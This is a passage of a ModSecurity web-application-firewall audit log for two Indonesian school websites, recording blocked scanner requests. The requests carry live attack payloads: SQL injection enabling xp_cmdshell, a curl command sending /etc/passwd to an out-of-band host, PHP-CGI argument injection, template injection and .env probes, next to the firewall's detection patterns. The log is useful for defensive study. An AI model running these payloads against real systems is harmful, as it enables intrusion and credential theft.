[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748371946625804 3056 (- - -) Stopwatch2: 1748371946625804 3056; combined=1290, p1=436, p2=825, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11228611-Z-- --244bb40f-A-- [28/May/2025:02:09:19 +0700] aDYN3xLFq2VRfSzm6b8sagAAAJA 103.236.140.4 60328 103.236.140.4 8181 --244bb40f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.92.39.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.92.39.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --244bb40f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --244bb40f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748372959120333 3018 (- - -) Stopwatch2: 1748372959120333 3018; combined=1283, p1=418, p2=830, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --244bb40f-Z-- --9fde137c-A-- [28/May/2025:02:22:36 +0700] aDYQ_N6cNBpj1JOkpQlrIwAAAEQ 103.236.140.4 60384 103.236.140.4 8181 --9fde137c-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 775 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0 Content-Type: application/soap+xml X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 162468187 --9fde137c-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0qa44pgpeoi1bmoheagqftk87sybwxky.oast.live'-- --9fde137c-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fde137c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748373756884534 3948 (- - -) Stopwatch2: 1748373756884534 3948; combined=2646, p1=541, p2=2019, p3=27, p4=32, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9fde137c-Z-- --b1b75b28-A-- [28/May/2025:02:53:42 +0700] aDYYRluSH_Spa4YU2ZnEQgAAANM 103.236.140.4 35598 103.236.140.4 8181 --b1b75b28-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.73.106.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.73.106.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b1b75b28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1b75b28-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748375622965694 2763 (- - -) Stopwatch2: 1748375622965694 2763; combined=1243, p1=419, p2=794, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1b75b28-Z-- --5212fa12-A-- [28/May/2025:03:07:42 +0700] aDYbjluSH_Spa4YU2ZnH4gAAAMc 103.236.140.4 47184 103.236.140.4 8181 --5212fa12-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.154.234.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.154.234.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5212fa12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5212fa12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748376462152724 2201 (- - -) Stopwatch2: 1748376462152724 2201; combined=1061, p1=353, p2=681, p3=0, p4=0, p5=27, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5212fa12-Z-- --d7686815-A-- [28/May/2025:03:12:51 +0700] aDYcw1uSH_Spa4YU2ZnJ0AAAAMw 103.236.140.4 53302 103.236.140.4 8181 --d7686815-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168684803 --d7686815-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d7686815-E-- --d7686815-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748376771409277 2764 (- - -) Stopwatch2: 1748376771409277 2764; combined=1144, p1=405, p2=710, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7686815-Z-- --05b4e947-A-- [28/May/2025:03:15:03 +0700] aDYdR96cNBpj1JOkpQlzQAAAAEA 103.236.140.4 55790 103.236.140.4 8181 --05b4e947-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 162471838 --05b4e947-C-- --05b4e947-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05b4e947-E-- --05b4e947-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748376903408950 3448 (- - -) Stopwatch2: 1748376903408950 3448; combined=2212, p1=470, p2=1708, p3=0, p4=0, p5=34, sr=82, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05b4e947-Z-- --1f4ace23-A-- [28/May/2025:03:15:05 +0700] aDYdSd6cNBpj1JOkpQlzSAAAAFQ 103.236.140.4 55826 103.236.140.4 8181 --1f4ace23-B-- POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.1 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168868932 --1f4ace23-C-- --1f4ace23-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f4ace23-E-- --1f4ace23-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748376905428348 3850 (- - -) Stopwatch2: 1748376905428348 3850; combined=2182, p1=456, p2=1694, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f4ace23-Z-- --1dceee7b-A-- [28/May/2025:03:15:07 +0700] aDYdS2TuEZUBy5rh0safRwAAAA0 103.236.140.4 55870 103.236.140.4 8181 --1dceee7b-B-- POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 162471874 --1dceee7b-C-- --1dceee7b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dceee7b-E-- --1dceee7b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748376907407863 3649 (- - -) Stopwatch2: 1748376907407863 3649; combined=2356, p1=479, p2=1847, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dceee7b-Z-- --8784ad26-A-- [28/May/2025:03:15:08 +0700] aDYdTFuSH_Spa4YU2ZnKmQAAAMA 103.236.140.4 55900 103.236.140.4 8181 --8784ad26-B-- POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (CentOS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168868962 --8784ad26-C-- --8784ad26-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8784ad26-E-- --8784ad26-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748376908390395 3918 (- - -) Stopwatch2: 1748376908390395 3918; combined=2063, p1=473, p2=1560, p3=0, p4=0, p5=29, sr=71, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8784ad26-Z-- --62a8ad35-A-- [28/May/2025:03:17:55 +0700] aDYd8xLFq2VRfSzm6b82GQAAAIs 103.236.140.4 58656 103.236.140.4 8181 --62a8ad35-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.94.253 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.94.253 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --62a8ad35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62a8ad35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748377075986881 828 (- - -) Stopwatch2: 1748377075986881 828; combined=346, p1=299, p2=0, p3=0, p4=0, p5=47, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62a8ad35-Z-- --6cd99c47-A-- [28/May/2025:03:47:24 +0700] aDYk3A3r-0gDryHAyD-D4QAAAEA 103.236.140.4 33806 103.236.140.4 8181 --6cd99c47-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 169083749 --6cd99c47-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0qa44pgpeoi1bmoheagknfrpdomc5goh.oast.live) --6cd99c47-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cd99c47-E-- --6cd99c47-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748378844742604 2609 (- - -) Stopwatch2: 1748378844742604 2609; combined=720, p1=459, p2=231, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6cd99c47-Z-- --44fa3c2f-A-- [28/May/2025:03:49:31 +0700] aDYlW_nnEwDNUSjDseLRtQAAAJI 103.236.140.4 35834 103.236.140.4 8181 --44fa3c2f-B-- GET / HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 166.108.197.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 166.108.197.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/7.0.0 Safari/700.13 Proxy-Connection: close --44fa3c2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44fa3c2f-H-- Message: Access denied with code 403 (phase 2). Matched phrase "/Proxy-Connection/" at TX:header_name. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||smkn22-jkt.sch.id|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748378971945812 2439 (- - -) Stopwatch2: 1748378971945812 2439; combined=1021, p1=457, p2=533, p3=0, p4=0, p5=31, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44fa3c2f-Z-- --e5b2281d-A-- [28/May/2025:03:51:56 +0700] aDYl7BwBHP_x2VCWa040rAAAAMs 103.236.140.4 38158 103.236.140.4 8181 --e5b2281d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.251.34.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.251.34.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e5b2281d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5b2281d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748379116057647 3134 (- - -) Stopwatch2: 1748379116057647 3134; combined=1473, p1=498, p2=944, p3=0, p4=0, p5=31, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5b2281d-Z-- --cdf05942-A-- [28/May/2025:03:57:11 +0700] aDYnJw3r-0gDryHAyD-GhAAAAFY 103.236.140.4 43200 103.236.140.4 8181 --cdf05942-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.192.30.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.192.30.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cdf05942-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cdf05942-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748379431427036 3348 (- - -) Stopwatch2: 1748379431427036 3348; combined=1524, p1=538, p2=950, p3=0, p4=0, p5=36, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cdf05942-Z-- --e0a0d24b-A-- [28/May/2025:04:08:48 +0700] aDYp4A3r-0gDryHAyD-I5wAAAEI 103.236.140.4 54282 103.236.140.4 8181 --e0a0d24b-B-- GET 